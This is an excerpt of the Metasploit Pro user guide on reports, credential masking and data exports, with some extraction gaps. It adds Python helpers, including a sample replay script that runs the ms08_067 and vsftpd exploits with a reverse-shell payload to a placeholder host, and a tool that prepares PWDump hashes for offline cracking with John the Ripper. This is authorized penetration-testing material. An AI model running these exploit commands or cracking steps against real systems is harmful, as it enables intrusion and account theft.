Output formats: PDF, HTML, RTF
Report options:
• Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The Audit report will display the user name with a blank password.
• Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session.
• Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in the report.
Report sections: Cover, Project Summary, and Task Details
Audit Report
Description: Provides a comprehensive and detailed report of the project findings.
Output formats: PDF, HTML, WORD, RTF
Report options:
• Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The Audit report will display the user name with a blank password.
• Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session.
• Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in the report.
Report sections: Executive Summary and Tags, Compromised Hosts, Compromised Credentials, Discovered OSes, Discovered Hosts, Host Details, Discovered Services, and Web Sites
Report directory: /path/to/metasploit/pro/reports/audit/
Report template: /path/to/metasploit/pro/reports/audit/msfxv3.jrxml
accompany statistical findings in the report.
Report sections: Project Summary, Executive Summary, Evidence Summary Table, Complete Evidence Table, Collected Screenshots, and Collected Text Files
Report directory: /path/to/metasploit/pro/reports/audit/
Report template: /path/to/metasploit/pro/reports/audit/msfxv3.jrxml
FISMA Compliance Report
Description: Reports on FISMA compliance criteria.
Output formats: PDF, HTML, WORD, RTF
Report options:
• Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The Audit report will display the user name with a blank password.
• Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session.
• Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in the report.
PCI Compliance Report
Description: Reports on PCI compliance criteria.
Output formats: PDF, HTML, WORD, RTF
Report options:
• Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The Audit report will display the user name with a blank password.
• Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session.
• Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in the report.
Report sections: Executive Summary, Requirements Status Summary, Host Status Summary, Detailed Findings
Report directory: /path/to/metasploit/pro/reports/audit/
Report template: /path/to/metasploit/pro/reports/audit/msfxv3.jrxml
Services Report
Description: Reports on all network services that were scanned or imported.
Output formats: PDF, HTML, WORD, RTF
Report options:
• Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The Audit report will display the user name with a blank password.
• Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session.
• Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in the report.
Report sections: Project Summary, Executive Summary, Network Service Summary, Network Services Table
Report directory: /path/to/metasploit/pro/reports/audit/
Report template: /path/to/metasploit/pro/reports/audit/msfxv3.jrxml
• Report started - This status indicates that the report has started generating.
• Report finished - This status indicates that the report was generated without errors and is ready for you to view and download. You can click on the alert to open the report. When you open the report from the Notification Center, it displays a unified view of the report and shows the formats that are available for it. You can click on any of the format icons to view the report in the selected format.
• Problem with report - This status indicates that there was an issue with the report and it was not able to finish. You will need to view the report log to troubleshoot the issue. For more information on report logs, see Report Logs on page 434.
The Reports page appears with the Generate Standard Report tab selected. 3. Click the Report type dropdown and choose the report you want to generate.
For more information on the report types that are available, see Metasploit Report Types on page 438. 4. Choose the file formats you want to generate for the report.
You can generate multiple formats for a report at the same time. Most reports can be generated as PDF, Word, RTF, or HTML documents; however, the Web Application Assessment Report cannot be generated as a Word file. 5. Enter a name for the report in the Report Name field. (Optional)
If you do not specify a name, Metasploit Pro uses the report type and the timestamp. For example, an Audit Report will be named Audit-20140106140552. 6. Use the Included addresses to explicitly define the hosts you want to include in the report. (Optional) For example, if you only want to include specific hosts in the report, you should define those hosts in the Included Addresses field. All other hosts will not be included in the report.
7. Use the Excluded addresses to explicitly define the hosts you want to exclude from the report. (Optional)
For example, if you only want to exclude specific hosts from the report, you should specify those hosts in the Excluded Addresses field. All other hosts will be included in the report.
8. Click the Campaign dropdown and select the campaign you want to use to create a report. (Social engineering reports only)
The report form only displays the campaigns that are stored in the project.
9. Click the Cover Logo dropdown and select the logo that you want to use on the cover page of the report.
If you have not uploaded a logo to the project, you must upload the logo that you want to use to the Custom Report Collateral area of the project. For more information on uploading a logo, see Adding a Custom Logo to a Report on page 457.
10. Select the report sections that you want to include in the report.
The report sections that are available will vary between reports. For more information on the sections available for each report, see Understanding Report Types on page 438.
11. Enable or disable any report options to manage the data that appears in the report.
The report form displays the options that are applicable for the report type that you have selected. The following report options may be available:
- Mask discovered passwords - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The report displays the user name and a blank password.
- Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session.
- Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in a report.
- Include web page HTML (in addition to image preview) - Includes the original page code as raw text as well as the rendered preview image. (Social Engineering Campaign Details Report only)
12. Enter the e-mail addresses you want to send the report to after the report generation. (Optional) You can use a comma or semi-colon to separate multiple e-mail addresses. To e-mail a report, you must have an active mail server configured through the Global Settings. For more information on setting up a mail server, see Defining SMTP Settings for a Mail Server on page 40.
13. Generate the report.
When the report generation begins, the web interface redirects you to the View Reports tab. At this point, you can navigate away from the Reports page to other areas in Metasploit Pro. The Notification Center will alert you when the report generation completes. When the report generation completes, you can click on the Notification Center icon to view the notification message or you can select Reports > Show Reports from the Project tab bar to access the Reports area. If an error occurred during report generation, you can view the report log to identify and troubleshoot any errors that occurred. For more information on report logs, see Report Logs on page 434.
When the report generation begins, the format button will be replaced with a progress indicator. The format button will reappear when the report is ready for you to view or download.
Generating a Custom Report
A custom report is created using a user-uploaded Jasper report template. The template defines the layout of the report and the sections that the report contains. You can create a report template from scratch using a tool like iReport. For more information on custom templates, see Working with Custom Templates on page 461.
Before you can generate a custom report, you must upload the template that you want to use to the Custom Report Collateral area of the project. If the project does not contain any custom report templates, the New Custom Report form will not load. Instead, the form displays a warning that the project does not contain any templates. You must upload a valid JRXML template to continue. For more information on uploading a custom template, see Uploading Templates on page 466.
3. Select the template you want to use to create the report.
4. Choose the file formats you want to generate for the report.
You can select multiple formats. All formats will be generated for the report at the same time.
5. Enter a name for the report in the Report Name field. (Optional)
If you do not specify a name, Metasploit Pro uses the report type and the timestamp. For example, a custom report will be named Custom-20140106140552.
6. Use the Included addresses to explicitly define the hosts you want to include in the report. (Optional)
For example, if you only want to include specific hosts in the report, you should define those hosts in the Included Addresses field. All other hosts will not be included in the report.
7. Use the Excluded addresses to explicitly define the hosts you want to exclude from the report. (Optional)
For example, if you only want to exclude specific hosts from the report, you should specify those hosts in the Excluded Addresses field. All other hosts will be included in the report.
8. Click the Cover Logo dropdown menu and select the logo you want to display on the cover page of the report. (Optional)
If you do not select a logo, the report will use the default Rapid7 logo.
9. Enter the e-mail addresses you want to send the report to after the report generates. (Optional)
You can use a comma or semi-colon to separate multiple e-mail addresses. To e-mail a report, you must have an active mail server configured through the Global Settings. For more information on setting up a mail server, see Defining SMTP Settings for a Mail Server on page 40.
10. Generate the report.
When the report generation begins, the web interface redirects you to the View Reports tab. At this point, you can navigate away from the Reports page to other areas in Metasploit Pro. The Notification Center will alert you when the report generation completes. When the report generation completes, you can click on the Notification Center icon to view the notification message or you can select Reports > Show Reports from the Project tab bar to access the Reports area. If an error occurred during report generation, you can view the report log to identify and troubleshoot any errors that occurred. For more information on report logs, see Report Logs on page 434.
Downloading a Report
1. Open the project that contains the report you want to download.
2. Select Reports > Show Reports from the Project tab bar.
The Reports page appears.
3. Find the row that contains the report you want to view.
The row displays the metadata and the file formats that have been generated for the report.
4. Click on the report name to open it.
The unified report view will open and display a preview of the report.
5. Select the formats you want to download.
The formats that are available for the report will have an active checkbox located next to them.
6. Click the Download button located under the Report Actions area.
The download process will automatically start. If your browser is not configured to automatically download files, a dialog window will appear and prompt you to save or run the file. You will need to save the report to your computer.
Viewing a Report
1. Open the project that contains the report you want to view.
2. Select Reports > Show Reports from the Project tab bar.
The Reports page appears.
3. Find the row that contains the report you want to view.
The row displays the metadata and the file formats that have been generated for the report.
4. Click on the format that you want to view the report in.
The report will open in your browser.
E-mailing a Report
You can quickly share reports by e-mailing them as soon as they are generated. Both the standard and custom report generation forms have an Email Report field that enables you to define a list of e-mail recipients.
As long as you have a valid mail server configured for your Metasploit Pro instance, the report will automatically be sent to the e-mails you have listed.
To clone a report:
1. Open the project that contains the report you want to clone.
2. Select Reports > Show Reports from the Project tab bar.
The Reports page appears.
3. Find the row that contains the report that you want to clone.
The New Report form appears. The form retains the configuration settings that you used to generate the original report.
Deleting Reports
When you delete a report, it will be permanently removed from the Reports directory, and you will no longer be able to view it from the Reports area of the web interface. Please make sure that you have the data that you need from the report before you delete it.
To delete a report:
1. Open the project that contains the report you want to delete.
2. Select Reports > Show Reports from the Project tab bar.
The Reports page appears.
3. Select the report or reports that you want to delete.
4. Click the Delete button located in the Quick Tasks bar.
The browser will ask you to confirm that you want to delete the report.
5. Select OK to delete the report.
To exclude specific sections, you can deselect the sections you do not want to appear in the report. When you generate the report, you will not see the excluded sections in the report. Additionally, the report will only show content for the sections for which it has data. For more information on report sections, see Metasploit Report Types on page 438.
To mask credentials from a report, you need to select the credential masking option on the New Report form. Select the Mask discovered credentials option to enable credential masking in your report.
When the masking option is enabled, the reports will not display plaintext credentials. For example, when you view the generated Audit report, the Compromised Credentials section only shows the host addresses, services, and user names that were discovered. The password, hash, and key fields are blank.
Other reports, such as the PCI and FISMA reports, replace all credentials with <blank>.
and web pages used. The raw content for the target list and e-mail will automatically be included in the report. If you want to include the raw content for the web pages, you will need to enable the Include web page HTML option. If enabled, this option includes the HTML for each web page used in the campaign. A preview of the web page will render in the report if the web page was used as part of a campaign. Note: If the web page delivered malicious code, such as a client-side exploit, Java applet, or executable file, a preview will not be rendered for the web page. If you want to include the raw HTML that was used to create a web page and a preview of the web page, you can select the Include web page HTML option on the New Report form.
Logo Requirements
The logo area on the cover page is 320 x 320 pixels. You can upload an image that is larger than the logo area, but the logo will be resized to fit the cover page.
If the image is larger than the logo area, the height of the image will be preserved, but the width will be resized.
The Open dialog window appears.
6. Browse to the location of the logo file.
Note: You can upload a GIF, JPEG, JPG, or PNG file.
7. Select the logo file and click the Open button.
8. Enter a name for the file in the Descriptive Name field. (Optional)
If you do not specify a name, the Custom Report Collateral area shows the original file name.
9. Click the Upload button.
The file appears under the Custom Report Collateral area.
If the project does not contain any logos, the New Report form will display a link to the Custom Reports page where you can upload your logo.
JasperReports documentation list - A list of the documentation that is available for JasperStudio, JasperReports Server, JasperReports Library, and iReport Designer. You can access this list at the following URL: http://community.jaspersoft.com/documentation.
- JasperReports Library materials reference - A list of the documentation, webinars, and articles that may be helpful for working with JasperReports. You can access this list at the following URL: http://community.jaspersoft.com/wiki/jasperreports-library-reference-materials.
- iReport Designer tutorials and help wiki - A wiki that lists the tutorials that are available for iReport Designer. You can access this list at the following URL: http://community.jaspersoft.com/wiki/ireport-designer-tutorials-help.
- An article on chart customizations - A useful list of chart customizers for JasperReports, iReport Designer, and JasperReports Server. You can view this article at the following URL: http://mdahlman.wordpress.com/2011/04/17/chart-customizers-2/.
- Groovy documentation - Groovy is a Java-compatible scripting language that you can use in place of Java to define expressions in iReport. To learn more about how Groovy and iReport Designer work together, visit the iReport wiki here: http://community.jaspersoft.com/wiki/ireport-designer-groovy. To learn more about Groovy, you can view their documentation here: http://groovy.codehaus.org/.
- Jaspersoft training - To learn more about Jaspersoft training, you can visit https://www.jaspersoft.com/training-services or https://www.jaspersoft.com/training.
- Experience with Jasper iReport, JasperReports, XML, and SQL/XPath
- Experience with Java or a Java scripting language, like Groovy or Javascript
- A working instance of Jasper iReport
- Access to the Metasploit database
- The database name - The default database name is msf3.
- The postgresql port - The default postgresql port is 7337.
- The user name - The default user name is msf3.
- The password - Please view the database.yml file for your database password.
The Datasource window appears.
3. Select Database JDBC connection from the list of data sources.
9. Test the connection.
If the connection is working properly, a window appears and alerts you that the connection was successful. Otherwise, if the connection fails, an exception window appears and alerts you that there is an issue with your database settings. You will need to verify that your database settings match the information in the database.yml file.
10. Save the connection, if the connection was successful.
You are now ready to create your report template. For resources on creating report templates, see Resources for JasperReports and iReport Designer on page 461.
Uploading Templates
After you have created your custom template, you will need to upload it to the project you want to use to build the custom report. The template will only be available to the project that you have uploaded it to; therefore, if you want to use the template across multiple projects, you will need to import the template into each project. When you view the New Custom Report form, the template will be available in the Report Template dropdown menu.
To upload a template:
1. Open the project you want to use to store the custom template.
2. Select Reports > Create Custom Report from the Project tab bar.
The Reports page appears with the Generate Custom Report tab selected.
3. Find the Custom Report Collateral area.
If your project does not contain any templates, the New Custom Report page will not show the form.
4. Click the Upload Custom Report Collateral button.
The Open dialog window appears.
6. Browse to the location of the template file.
7. Select the template and click the Open button.
The template must have a JRXML extension.
8. Enter a name for the template in the Descriptive Name field. (Optional)
If you do not specify a name, the Custom Report Collateral area shows the original file name.
9. Click the Submit button.
The template appears under the Custom Report Collateral area.
You are now ready to generate a custom report. For more information on generating custom reports, see Generating a Custom Report on page 447.
The Reports page appears with the Generate Custom Report tab selected.
3. Find the Custom Report Collateral area.
4. Find the row that contains the custom report template you want to download.
The row displays the metadata and the actions that are available for the custom report template.
5. Click the Download link.
The download process will automatically start. If your browser is not configured to automatically download files, a dialog window will appear and prompt you to save or run the file. You will need to save the template to your computer.
The Reports page appears with the Generate Custom Report tab selected.
3. Find the Custom Report Collateral area.
4. Find the row that contains the custom report template you want to delete.
The row displays the metadata and the actions that are available for the custom report template.
5. Click the Delete link.
The browser will prompt you to confirm that you want to delete the custom report template.
4. Click the Download Example Template link, which is located below the reports table.
The download process will automatically start. If your browser is not configured to automatically download files, a dialog window will appear and prompt you to save or run the file. You will need to save the example template to your computer.
Exporting Data
A data export enables you to routinely back up project data and create an archive of your tests. When you export data from a project, its contents are copied and saved to a file that can be imported into other projects or shared with other instances of Metasploit Pro. All exports can be downloaded from the Exports area of the web interface or from the exports directory.
Exports Directory
When Metasploit Pro generates an export, it stores a copy of the file in /path/to/Metasploit/apps/pro/exports. The files that are stored in this directory will match the list of exports displayed in the web interface. You can go to the exports directory to download or view exported data; however, you should not make any changes directly to the default exports directory. If you need to modify the export files, you should make a copy of the exports directory and make your changes in the new directory. Any changes that you make directly to the export files can cause disparities between the metadata that displays for the file in the web interface and the file itself. If you need to remove exports from a project, you should do it from within the web interface. Do not delete them directly from the exports directory.
Export Logs
The export log maintains a historical record of all export-related events. Metasploit Pro automatically updates the export log each time you export data from a project. If you experience any issues with an export, you can view the export log to find stack trace errors and troubleshoot them.
Exporting Data
- Export started - This status indicates that the export has started.
- Export finished - This status indicates that the export has completed without errors and is ready for you to download. You can click on this alert to open the Exports page, which will list all of the export files that have been generated for the project. You can sort by the creation date to find the latest export file.
- Problem with export - This status indicates that there was an issue with the export and it was not able to finish. You will need to view the export log to troubleshoot the issue. For more information on export logs, see Export Logs on page 473.
Export Types
Metasploit Pro offers the following export types:
- XML export - An XML file that contains the attributes for most of the objects in a project and can be imported into another project. XML exports are particularly useful if you have a data set that you want to reuse in another project or share with another instance of Metasploit Pro. For example, you can export an XML of project data if you want to reuse the scan data from a particular project.
- Workspace ZIP - A zip that contains an XML export and any loot files, report files, and task logs. This export type is useful if you want to back up the data and contents in a project or share the project with other instances of Metasploit Pro.
- Replay script - A batch file that reruns tasks that opened sessions on target hosts. A replay script consists of multiple resource files (.rc). Metasploit Pro creates a resource file for each session it opens. You can run a replay script from the pro console or msfconsole.
- PWDump - A text file that contains all of the credentials for a project, including plaintext passwords, SMB hashes, and SSH keys. Credentials can be masked to enumerate user names only.
XML Exports
When you export your project as an XML file, it contains most of the data that you see from the Analysis area of a project--with a few exceptions. The exported XML file contains most of the objects in a project's database and their attributes; it does not include any files that are associated with the objects in a project, such as task logs, generated reports, and loot files. When you view the XML export file, you will see the following objects:
- Hosts - Contains the details for each host in the project, including the following attributes: notes, tags, vulnerabilities, credentials, and sessions. It also includes host details, such as the host ID, IP address, MAC address, host name, OS name, OS flavor, OS service pack, and purpose.
- Events - Contains the event log for the project. Each event includes the workspace ID, event creation date, event name, and name of the user who launched the task.
- Sessions - Contains the details for each session obtained in the project, including the following attributes: host ID, session type, module used, session description, port used, and session open/close dates.
- Services - Contains the details for each service discovered in the project, including the service ID, host ID, port number, protocol type, state, service name, creation date, and modification date.
- Credentials - Contains the details for each credential stored in the project, including the credential ID, service ID, user name, password, creation date, and modification date.
- Web sites - Contains the details for each web server discovered, including the website ID, service ID, host address, VHOST address, HTTP port, creation date, and modification date.
- Web pages - Contains the details for each web page discovered, including the web page ID, HTTP response code, VHOST address, web server address, HTTP port, content type, page content, creation date, and modification date.
- Web forms - Contains the details for each web form discovered, including the web form ID, form path, request method, VHOST address, web server address, HTTP port, content type, page content, creation date, and modification date.
- Web vulnerabilities - Contains the details for each web vulnerability discovered, including the vulnerability category, vulnerability description, vulnerability confidence ranking, request method, vulnerability name, HTTP port, proof text, VHOST address, and vulnerability blame.
Note: Additional attributes may be available for each object; however, this list covers the most common attributes for each object.
4. Replace the export file name with a custom name, if you do not want to use the default name. (Optional)
5. Define the hosts you want to explicitly include in the Included addresses field. (Optional)
6. Define the hosts you want to explicitly exclude in the Excluded addresses field. (Optional)
7. Select the Mask credentials option from the Export Options section if you do not want to include credentials in the export.
The credentials will be replaced with **MASKED** in the XML file. If you import the XML file into a project, the credentials will not be included.
8. Click the Export Data button.
When the export begins, you will be taken back to the Exports page. The Exports page displays an "Export creation queued" message.
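Credential masking, whether applied to a report (Masking Credentials above) or to an XML export as in step 7, is the control that keeps plaintext passwords, hashes and SSH keys out of files that leave the engagement, so it is worth verifying on the actual file before it is shared. The following added example is not Metasploit Pro code: it walks an export, lists every credential whose secret is neither empty nor **MASKED**, and can rewrite an unmasked export in place. The element names it looks for (<host>, <address>, <cred>, <user>, <pass>, <ptype>) and the sample document are assumptions about the export layout; check them against a real export and adjust the tag names if they differ.

```python
"""Check a Metasploit Pro XML export for unmasked credentials before sharing it.

Added example, not Metasploit Pro code. The element names used here are an
assumption about the export layout; adjust them to match a real export.
"""
import xml.etree.ElementTree as ET

MASK = "**MASKED**"   # marker the export option writes in place of a secret

# Constructed sample export: one masked credential and one left in plaintext.
SAMPLE_EXPORT = """<?xml version="1.0"?>
<MetasploitV4>
  <hosts>
    <host>
      <address>192.0.2.10</address>
      <creds>
        <cred><port>22</port><user>root</user><pass>**MASKED**</pass><ptype>password</ptype></cred>
        <cred><port>445</port><user>admin</user><pass>aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0</pass><ptype>smb_hash</ptype></cred>
      </creds>
    </host>
  </hosts>
</MetasploitV4>
"""


def find_unmasked(xml_text):
    """Return (host address, user, ptype) for every credential whose secret is present and not masked."""
    root = ET.fromstring(xml_text)
    leaks = []
    for host in root.iter("host"):
        addr = host.findtext("address", default="?")
        for cred in host.iter("cred"):
            secret = (cred.findtext("pass") or "").strip()
            if secret and secret != MASK:
                leaks.append((addr, cred.findtext("user", default="?"), cred.findtext("ptype", default="?")))
    return leaks


def mask_export(xml_text):
    """Return a copy of the export with every non-empty <pass> replaced by the mask marker."""
    root = ET.fromstring(xml_text)
    for secret in root.iter("pass"):
        if (secret.text or "").strip():
            secret.text = MASK
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    for addr, user, ptype in find_unmasked(SAMPLE_EXPORT):
        print(f"UNMASKED {ptype} for {user}@{addr}")
    print("clean after masking:", find_unmasked(mask_export(SAMPLE_EXPORT)) == [])
```

Run find_unmasked over the XML you are about to hand over and refuse to ship it while the list is non-empty. Note that this checks only the XML: a workspace ZIP also carries the loot directory, which the page says holds hashes and SSH keys as files, so a ZIP needs the same review of its loot files.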
The Notification Center icon will turn green and alert you when the export starts and completes. You can click on the Notification Center icon to view a list of system wide alerts. When the export completes, you can click on the notification message or you can select Exports > Show Exports from the Project tab bar to access the Exports area. When the export is ready, it will be listed at the top of the Exports List. It will use the following naming convention: export-[current date and time]. If you do not see it at the top of the Exports List, click on the Create Date column name to sort the list by descending creation date. If an error occurred during the export and the export was unable to complete, you can view the export log to identify and troubleshoot any errors that occurred. For more information on export logs, see Export Logs on page 473.
Workspace ZIP
A workspace ZIP contains an XML export, which details the attributes for most of the objects in a project, and any associated directories that contain loot files, report files, and task logs. You can export a workspace ZIP to make a copy of a project, its data, and its files. This is useful when you want to back up your findings or when you want to import the data into other projects. When you export a project, Metasploit Pro generates a ZIP file that contains the following:
- Exported XML file - Contains most of the objects in a project, including hosts, services, sessions, credentials, module details, and events.
- Reports directory - Contains all of the generated reports for the project.
- Tasks directory - Contains text files that detail each task run.
- Loot directory - Contains the loot files for the project, including hashes and SSH keys.
4. Replace the export file name with a custom name, if you do not want to use the default name. (Optional)
5. Use the Included addresses to explicitly define the hosts you want to include in the export. (Optional)
6. Use the Excluded addresses to explicitly define the hosts you want to exclude from the export. (Optional)
7. If you do not want to include credentials in the export, select the Mask credentials option from the Export Options section.
8. Click the Export Data button.
When the export begins, you will be taken back to the Exports page. The Exports page displays an "Export creation queued" message. The Notification Center icon will turn green and alert you when the export starts and completes. You can click on the Notification Center icon to view a list of system wide alerts. When the export completes, you can click on the notification message or you can select Exports > Show Exports from the Project tab bar to access the Exports area.
The ZIP file will be listed at the top of the Exports List. It will use the following naming convention: export-[current date and time]. If you do not see it at the top of the Exports List, click on the Create Date column name to sort the list by descending creation date. If an error occurred during the export and the export was unable to complete, you can view the export log to identify and troubleshoot any errors that occurred. For more information on export logs, see Export Logs on page 473.
Replay Scripts
A replay script is a batch file that reruns tasks that opened sessions on target hosts. You can export a replay script to automate successful attacks through the pro console or msfconsole. When you export a replay script, Metasploit Pro creates a resource file for each opened session and compresses them into a ZIP file.
4. Use the Included addresses to explicitly define the hosts you want to include in the replay scripts. (Optional)
5. Use the Excluded addresses to explicitly define the hosts you want to exclude from the replay scripts. (Optional)
6. If you do not want to include credentials in the export, select the Mask credentials option from the Export Options section.
7. Click the Export Data button.
When the export begins, you will be taken back to the Exports page. The Exports page displays an "Export creation queued" message. The Notification Center icon will turn green and alert you when the export starts and completes. You can click on the Notification Center icon to view a list of system wide alerts. When the export completes, you can click on the notification message or you can select Exports > Show Exports from the Project tab bar to access the Exports area. The ZIP file will be listed at the top of the Exports List. It will use the following naming convention: export-[current date and time]. If you do not see it at the top of the Exports List, click on the Create Date column name to sort the list by descending creation date. If an error occurred during the export and the export was unable to complete, you can view the export log to identify and troubleshoot any errors that occurred. For more information on export logs, see Export Logs on page 473.
Note: Before you can run the resource files, you will need to extract them from the ZIP file.
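A replay script reruns the attacks that previously produced sessions, so before extracting the resource files and feeding them to msfconsole it is worth confirming that every target they name is still inside the authorized scope (a project exported with broad Included addresses, or replayed weeks later, can easily carry hosts that are no longer in play). The following added example is not Metasploit Pro code: it reads the .rc files out of a replay-script ZIP, pulls the module and RHOST from each, and flags any target outside a list of in-scope networks. The resource-file layout it assumes (plain console commands such as use, set and exploit, one per line) and the sample archive it builds are constructed for the example.

```python
"""Review the resource files in a replay-script ZIP before rerunning them.

Added example, not Metasploit Pro code. Assumes each .rc file is a plain list
of console commands (use / set / exploit) and that the target is set via RHOST
or RHOSTS; the sample ZIP below is constructed, not a real export.
"""
import io
import ipaddress
import re
import zipfile

USE_RE = re.compile(r"^\s*use\s+(?P<module>\S+)", re.IGNORECASE)
SET_RE = re.compile(r"^\s*set\s+(?P<key>\S+)\s+(?P<value>\S+)", re.IGNORECASE)


def build_sample_zip():
    """Constructed replay-script archive with two resource files (not a real export)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(
            "session_1.rc",
            "use exploit/windows/smb/ms08_067_netapi\n"
            "set RHOST 192.0.2.15\nset RPORT 445\n"
            "set PAYLOAD windows/meterpreter/reverse_tcp\nset LHOST 192.0.2.99\n"
            "exploit -j -z\n",
        )
        zf.writestr(
            "session_2.rc",
            "use exploit/unix/ftp/vsftpd_234_backdoor\n"
            "set RHOST 198.51.100.7\nset RPORT 21\nexploit -j -z\n",
        )
    return buf.getvalue()


def parse_rc(text):
    """Return (modules used, {OPTION: value}) found in one resource file."""
    modules, settings = [], {}
    for line in text.splitlines():
        m = USE_RE.match(line)
        if m:
            modules.append(m["module"])
            continue
        m = SET_RE.match(line)
        if m:
            settings[m["key"].upper()] = m["value"]
    return modules, settings


def review_replay_zip(zip_bytes, scope):
    """Map each .rc file in the archive to (modules, target, in_scope) against the given CIDR list."""
    nets = [ipaddress.ip_network(s, strict=False) for s in scope]
    result = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in sorted(zf.namelist()):
            if not name.endswith(".rc"):
                continue
            modules, settings = parse_rc(zf.read(name).decode("utf-8", errors="replace"))
            target = settings.get("RHOST") or settings.get("RHOSTS")
            try:
                in_scope = target is not None and any(ipaddress.ip_address(target) in n for n in nets)
            except ValueError:
                in_scope = False   # a hostname or range, not a single IP: resolve and check by hand
            result[name] = (modules, target, in_scope)
    return result


if __name__ == "__main__":
    for name, (mods, target, ok) in review_replay_zip(build_sample_zip(), ["192.0.2.0/24"]).items():
        print(f"{name}: {', '.join(mods)} -> {target} {'IN SCOPE' if ok else 'OUT OF SCOPE'}")
```

Only the files reported as in scope should be extracted and run (msfconsole -r session_1.rc); anything flagged out of scope, or whose target could not be parsed, gets a manual look first.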
PWDumps
A PWDump is a text file that contains all of the credentials for a project, including plaintext passwords, SMB hashes, and SSH keys. You can export a PWDump file to perform offline password cracking with a tool like John the Ripper.
Exporting a PWDump
1. Open the project from which you want to export data.
2. Select Exports > Export Data from the Project tab bar.
The Export Data page appears.
4. Use the Included addresses to explicitly define the hosts you want to include in the export. (Optional)
5. Use the Excluded addresses to explicitly define the hosts you want to exclude from the export. (Optional)
6. Click the Export Data button.
7. When the export begins, you will be taken back to the Exports page.
The Notification Center icon will turn green and alert you when the export starts and completes. You can click on the Notification Center icon to view a list of system wide alerts. When the export completes, you can click on the notification message or you can select Exports > Show Exports from the Project tab bar to access the Exports area. The PWDump will be listed at the top of the Exports List. It will use the following naming convention: export-[current date and time]. If you do not see it at the top of the Exports List, click on the Create Date column name to sort the list by descending creation date. If an error occurred during the export and the export was unable to complete, you can view the export log to identify and troubleshoot any errors that occurred. For more information on export logs, see Export Logs on page 473.
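The PWDump export exists to feed an offline cracker, and the practical step between the two is splitting the file by hash type so John the Ripper can be pointed at each with the right format. The following added example is not Metasploit Pro code: it parses pwdump-style SMB lines, sends LM hashes to their own file (they are far weaker and should be cracked first), skips accounts whose NT hash is the well-known empty-password value (nothing to crack, but a finding in itself), and sets aside anything it cannot parse for manual review. The classic pwdump line layout (user:rid:LMhash:NThash:::) is an assumption; compare it against a real export before relying on the parser, and the sample lines are constructed.

```python
"""Split a PWDump export into John the Ripper input by hash type.

Added example, not Metasploit Pro code. Assumes the classic pwdump line layout
(user:rid:LMhash:NThash:::) for SMB hashes; the sample data is constructed.
"""
import re

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of an empty password (LM storage disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of an empty password

PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)

# Constructed sample, not a real export.
SAMPLE_PWDUMP = """# LM/NTLM hashes (constructed sample)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1105:299bd128c1101fd6aad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
jdoe:1001:aad3b435b51404eeaad3b435b51404ee:5835048ce94ad0564e29a924a03510ef:::
this is not a pwdump line
"""


def split_pwdump(text):
    """Return (nt_lines, lm_lines, empty_password_accounts, unparsed_lines)."""
    nt, lm, empty, unparsed = [], [], [], []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue                      # comments and blank lines
        m = PWDUMP_RE.match(line)
        if not m:
            unparsed.append(line)         # different layout: look at it by hand
            continue
        if m["nt"].lower() == EMPTY_NT:
            empty.append(m["user"])       # blank password: report, nothing to crack
            continue
        nt.append(f"{m['user']}:{m['nt']}")
        if m["lm"].lower() != EMPTY_LM:
            lm.append(f"{m['user']}:{m['lm']}")   # LM present: crack this first
    return nt, lm, empty, unparsed


def write_john_inputs(text, nt_path="nt.txt", lm_path="lm.txt"):
    """Write user:hash files for john --format=NT and john --format=LM; return the split."""
    nt, lm, empty, unparsed = split_pwdump(text)
    with open(nt_path, "w") as fh:
        fh.write("\n".join(nt) + ("\n" if nt else ""))
    with open(lm_path, "w") as fh:
        fh.write("\n".join(lm) + ("\n" if lm else ""))
    return nt, lm, empty, unparsed


if __name__ == "__main__":
    nt, lm, empty, unparsed = split_pwdump(SAMPLE_PWDUMP)
    print("NT hashes to crack:", len(nt), "| LM hashes:", len(lm))
    print("empty-password accounts:", empty)
    print("unparsed lines:", unparsed)
```

With the two output files in hand, john --format=LM lm.txt and john --format=NT nt.txt run the cracks; the unparsed list is where SSH keys and plaintext entries from the export will land, since they do not follow the pwdump line layout.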
Frequently Asked Questions
The following section provides answers to some of the most commonly asked questions, including:
- How do I restart the Metasploit service on Linux? on page iv
- How do I restart the Metasploit service on Windows? on page v
- I set up my mail server, but it's not sending any e-mail. How can I troubleshoot this issue? on page ii
- Where do I configure the SMTP settings for my mail server? on page iii
- Why is there a partial blank screen on the video tutorials? on page iv
